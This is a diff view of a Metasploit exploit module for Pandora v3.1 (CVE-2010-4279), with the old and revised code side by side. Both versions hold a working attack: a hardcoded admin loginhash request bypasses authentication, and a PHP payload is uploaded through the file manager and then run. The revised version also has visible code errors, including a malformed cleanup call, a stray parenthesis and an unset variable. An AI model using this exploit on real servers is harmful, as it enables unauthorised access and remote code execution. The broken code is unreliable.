|
1 | 1 | ## |
2 | | -# This file is part of the Metasploit Framework and may be subject to |
3 | | -# redistribution and commercial restrictions. Please see the Metasploit |
4 | | -# Framework web site for more information on licensing and terms of use. |
5 | | -# http://metasploit.com/framework/ |
| 2 | +# This module requires Metasploit: http//metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
6 | 4 | ## |
7 | 5 |
|
8 | 6 | require 'msf/core' |
9 | 7 |
|
10 | 8 | class Metasploit3 < Msf::Exploit::Remote |
11 | | - Rank = ExcellentRanking |
12 | | - |
13 | | - include Msf::Exploit::Remote::HttpClient |
14 | | - |
15 | | - def initialize(info={}) |
16 | | - super(update_info(info, |
17 | | - 'Name' => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability", |
18 | | - 'Description' => %q{ |
19 | | - This module exploits an authentication bypass vulnerability in Pandora v3.1 as |
20 | | - disclosed by Juan Galiana Lara. It also integrates with the built-in pandora |
21 | | - upload which allows a user to upload arbitrary files to the '/images/' directory. |
22 | | -
|
23 | | - This module was created as an exercise in the Metasploit Mastery Class at Blackhat |
24 | | - that was facilitated by egypt and mubix. |
25 | | - }, |
26 | | - 'License' => MSF_LICENSE, |
27 | | - 'Author' => |
28 | | - [ |
29 | | - 'Raymond Nunez <rcnunez[at]upd.edu.ph>', # metasploit module |
30 | | - '_flood <freshbones[at]gmail.com>', # metasploit module |
31 | | - 'mubix <mubix[at]room362.com>', # auth bypass and file upload |
32 | | - 'egypt <egypt[at]metasploit.com>', # auth bypass file upload |
33 | | - ], |
34 | | - 'References' => |
35 | | - [ |
36 | | - ['CVE', '2010-4279'], |
37 | | - ['OSVDB', '69549'], |
38 | | - ['BID', '45112'] |
39 | | - ], |
40 | | - 'Platform' => 'php', |
41 | | - 'Arch' => ARCH_PHP, |
42 | | - 'Targets' => |
43 | | - [ |
44 | | - ['Automatic Targeting', { 'auto' => true }] |
45 | | - ], |
46 | | - 'Privileged' => false, |
47 | | - 'DisclosureDate' => "Nov 30 2010", |
48 | | - 'DefaultTarget' => 0)) |
49 | | - |
50 | | - register_options( |
51 | | - [ |
52 | | - OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']), |
53 | | - ], self.class) |
54 | | - end |
55 | | - |
56 | | - def check |
57 | | - |
58 | | - base = target_uri.path |
59 | | - peer = "#{rhost}:#{rport}" |
60 | | - |
61 | | - # retrieve software version from login page |
62 | | - begin |
63 | | - res = send_request_cgi({ |
64 | | - 'method' => 'GET', |
65 | | - 'uri' => normalize_uri(base, 'index.php') |
66 | | - }) |
67 | | - if res and res.code == 200 |
68 | | - if res.body =~ /v3.1 Build PC100609/ |
69 | | - return Exploit::CheckCode::Vulnerable |
70 | | - elsif res.body =~ /Pandora/ |
71 | | - return Exploit::CheckCode::Detected |
72 | | - end |
73 | | - end |
74 | | - return Exploit::CheckCode::Safe |
75 | | - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout |
76 | | - print_error("#{peer} - Connection failed") |
77 | | - end |
78 | | - return Exploit::CheckCode::Unknown |
79 | | - |
80 | | - end |
81 | | - |
82 | | - # upload a payload using the pandora built-in file upload |
83 | | - def upload(base, file, cookiemonster) |
84 | | - data = Rex::MIME::Message.new |
85 | | - data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}.php\"") |
86 | | - data.add_part("Go", nil, nil, 'form-data; name="go"') |
87 | | - data.add_part("images", nil, nil, 'form-data; name="directory"') |
88 | | - data.add_part("1", nil, nil, 'form-data; name="upload_file"') |
89 | | - data_post = data.to_s |
90 | | - data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') |
91 | | - |
92 | | - res = send_request_cgi({ |
93 | | - 'method' => 'POST', |
94 | | - 'uri' => normalize_uri(base, 'index.php?sec=gsetup&sec2=godmode/setup/file_manager'), |
95 | | - 'cookie' => cookiemonster, |
96 | | - 'ctype' => "multipart/form-data; boundary=#{data.bound}", |
97 | | - 'data' => data_post |
98 | | - }) |
99 | | - return res |
100 | | - end |
101 | | - |
102 | | - def on_new_session(client) |
103 | | - if client.type == "meterpreter" |
104 | | - client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") |
105 | | - client.fs.file.rm("#{@fname}.php") |
106 | | - else |
107 | | - client.shell_command_token("rm #{@fname}.php") |
108 | | - end |
109 | | - end |
110 | | - |
111 | | - def exploit |
112 | | - |
113 | | - base = target_uri.path |
114 | | - @peer = "#{rhost}:#{rport}" |
115 | | - @fname = rand_text_numeric(7) |
116 | | - |
117 | | - # bypass authentication and get session cookie |
118 | | - res = send_request_cgi({ |
119 | | - 'method' => 'GET', |
120 | | - 'uri' => normalize_uri(base, 'index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1') |
121 | | - }) |
122 | | - |
123 | | - # fix if logic |
124 | | - if res and res.code == 200 |
125 | | - if res.body =~ /Logout/ |
126 | | - cookiemonster = res.headers['Set-Cookie'] |
127 | | - cookiemonster = cookiemonster.split(" ")[0] |
128 | | - print_status("Login Bypass Successful") |
129 | | - print_status("cookie monster = " + cookiemonster) |
130 | | - else |
131 | | - print_error("Login Bypass Failed") |
132 | | - fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Login bypass failed") |
133 | | - end |
134 | | - end |
135 | | - |
136 | | - # upload PHP payload to images/[fname].php |
137 | | - print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") |
138 | | - php = %Q|<?php #{payload.encoded} ?>| |
139 | | - begin |
140 | | - res = upload(base, php, cookiemonster) |
141 | | - if res and res.code == 200 |
142 | | - print_good("#{@peer} - File uploaded successfully") |
143 | | - else |
144 | | - fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") |
145 | | - end |
146 | | - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout |
147 | | - fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") |
148 | | - end |
149 | | - |
150 | | - # retrieve and execute PHP payload |
151 | | - print_status("#{@peer} - Executing payload (images/#{@fname}.php)") |
152 | | - begin |
153 | | - print_status ("base = " + base) |
154 | | - res = send_request_cgi({ |
155 | | - 'method' => 'GET', |
156 | | - 'uri' => normalize_uri(base, 'images', "#{@fname}.php") |
157 | | - }) |
158 | | - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout |
159 | | - fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") |
160 | | - end |
161 | | - |
162 | | - end |
| 9 | + Rank = ExcellentRanking |
| 10 | + |
| 11 | + include Msf::Exploit::Remote::HttpClient |
| 12 | + include Msf::Exploit::FileDropper |
| 13 | + |
| 14 | + def initialize(info={}) |
| 15 | + super(update_info(info, |
| 16 | + 'Name' => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability", |
| 17 | + 'Description' => %q{ |
| 18 | + This module exploits an authentication bypass vulnerability in Pandora v3.1 as |
| 19 | + disclosed by Juan Galiana Lara. It also integrates with the built-in pandora |
| 20 | + upload which allows a user to upload arbitrary files to the '/images/' directory. |
| 21 | +
|
| 22 | + This module was created as an exercise in the Metasploit Mastery Class at Blackhat |
| 23 | + that was facilitated by egypt and mubix. |
| 24 | +
|
| 25 | + }, |
| 26 | + 'License' => MSF_LICENSE, |
| 27 | + 'Author' => |
| 28 | + [ |
| 29 | + 'Juan Galiana Lara', # Vulnerability discovery |
| 30 | + 'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module |
| 31 | + 'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module |
| 32 | + '_flood <freshbones[at]gmail.com>', # Metasploit module |
| 33 | + 'mubix <mubix[at]room362.com>', # Auth bypass and file upload |
| 34 | + 'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload |
| 35 | + ], |
| 36 | + 'References' => |
| 37 | + [ |
| 38 | + ['CVE', '2010-4279'], |
| 39 | + ['OSVDB', '69549'], |
| 40 | + ['BID', '45112'] |
| 41 | + ], |
| 42 | + 'Platform' => 'php', |
| 43 | + 'Arch' => ARCH_PHP, |
| 44 | + 'Targets' => |
| 45 | + [ |
| 46 | + ['Automatic Targeting', { 'auto' => true }] |
| 47 | + ], |
| 48 | + 'Privileged' => false, |
| 49 | + 'DisclosureDate' => "Nov 30 2010", |
| 50 | + 'DefaultTarget' => 0)) |
| 51 | + |
| 52 | + register_options( |
| 53 | + [ |
| 54 | + OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']), |
| 55 | + ], self.class) |
| 56 | + end |
| 57 | + |
| 58 | + def check |
| 59 | + |
| 60 | + base = target_uri.path |
| 61 | + |
| 62 | + # retrieve software version from login page |
| 63 | + begin |
| 64 | + res = send_request_cgi({ |
| 65 | + 'method' => 'GET', |
| 66 | + 'uri' => normalize_uri(base, 'index.php') |
| 67 | + }) |
| 68 | + if res and res.code == 200 |
| 69 | + if res.body.include?("v3.1 Build PC100609") |
| 70 | + return Exploit::CheckCode::Vulnerable |
| 71 | + elsif res.body.include?("Pandora") |
| 72 | + return Exploit::CheckCode::Detected |
| 73 | + end |
| 74 | + end |
| 75 | + return Exploit::CheckCode::Safe |
| 76 | + rescue ::Rex::ConnectionError |
| 77 | + print_error("#{peer} - Connection failed") |
| 78 | + end |
| 79 | + return Exploit::CheckCode::Unknown |
| 80 | + |
| 81 | + end |
| 82 | + |
| 83 | + # upload a payload using the pandora built-in file upload |
| 84 | + def upload(base, file, cookies) |
| 85 | + |
| 86 | + begin |
| 87 | + data = Rex::MIME::Message.new |
| 88 | + data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"") |
| 89 | + data.add_part("Go", nil, nil, 'form-data; name="go"') |
| 90 | + data.add_part("images", nil, nil, 'form-data; name="directory"') |
| 91 | + data.add_part("1", nil, nil, 'form-data; name="upload_file"') |
| 92 | + data_post = data.to_s |
| 93 | + |
| 94 | + res = send_request_cgi({ |
| 95 | + 'method' => 'POST', |
| 96 | + 'uri' => normalize_uri(base, 'index.php'), |
| 97 | + 'cookie' => cookies, |
| 98 | + 'ctype' => "multipart/form-data; boundary=#{data.bound}", |
| 99 | + 'vars_get' => { |
| 100 | + 'sec' => 'gsetup', |
| 101 | + 'sec2' => 'godmode/setup/file_manager', |
| 102 | + }, |
| 103 | + 'data' => data_post |
| 104 | + }) |
| 105 | + |
| 106 | + register_files_for cleanup(@fname) |
| 107 | + return res |
| 108 | + |
| 109 | + rescue ::URI::InvalidURIError |
| 110 | + fail_with(Exploit::Failure::Unknown, "Unable to get the uri correctly") |
| 111 | + end |
| 112 | + |
| 113 | + end |
| 114 | + |
| 115 | + def exploit |
| 116 | + |
| 117 | + base = target_uri.path |
| 118 | + @fname = "#{rand_text_numeric(7)}.php") |
| 119 | + cookies = "" |
| 120 | + |
| 121 | + # bypass authentication and get session cookie |
| 122 | + res = send_request_cgi({ |
| 123 | + 'method' => 'GET', |
| 124 | + 'uri' => normalize_uri(base, 'index.php'), |
| 125 | + 'vars_get' => { |
| 126 | + 'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3', |
| 127 | + 'loginhash_user' => 'admin', |
| 128 | + 'loginhash' => '1', |
| 129 | + }, |
| 130 | + }) |
| 131 | + |
| 132 | + # fix if logic |
| 133 | + if res and res.code == 200 |
| 134 | + if res.body.include?("Logout") |
| 135 | + cookies = res.headers['Set-Cookie'] |
| 136 | + cookies = res.get_cookies |
| 137 | + print_status("Login Bypass Successful") |
| 138 | + print_status("cookie monster = " + cookies) |
| 139 | + else |
| 140 | + print_error("Login Bypass Failed") |
| 141 | + end |
| 142 | + end |
| 143 | + |
| 144 | + # upload PHP payload to images/[fname] |
| 145 | + print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") |
| 146 | + php = %Q|<?php #{payload.encoded} ?>| |
| 147 | + begin |
| 148 | + res = upload(base, php, cookies) |
| 149 | + if res and res.code == 200 |
| 150 | + print_good("#{@peer} - File uploaded successfully") |
| 151 | + else |
| 152 | + fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") |
| 153 | + end |
| 154 | + rescue ::Rex::ConnectionError |
| 155 | + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") |
| 156 | + end |
| 157 | + |
| 158 | + # retrieve and execute PHP payload |
| 159 | + print_status("#{@peer} - Executing payload (images/#{@fname}") |
| 160 | + begin |
| 161 | + res = send_request_cgi({ |
| 162 | + 'method' => 'GET', |
| 163 | + 'uri' => normalize_uri(base, 'images', "#{@fname}") |
| 164 | + }) |
| 165 | + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout |
| 166 | + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") |
| 167 | + end |
| 168 | + |
| 169 | + end |
163 | 170 | end |
0 commit comments